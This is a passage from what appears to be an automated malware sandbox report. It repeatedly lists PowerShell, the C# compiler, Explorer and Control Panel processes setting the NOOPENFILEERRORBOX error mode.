Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\control.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |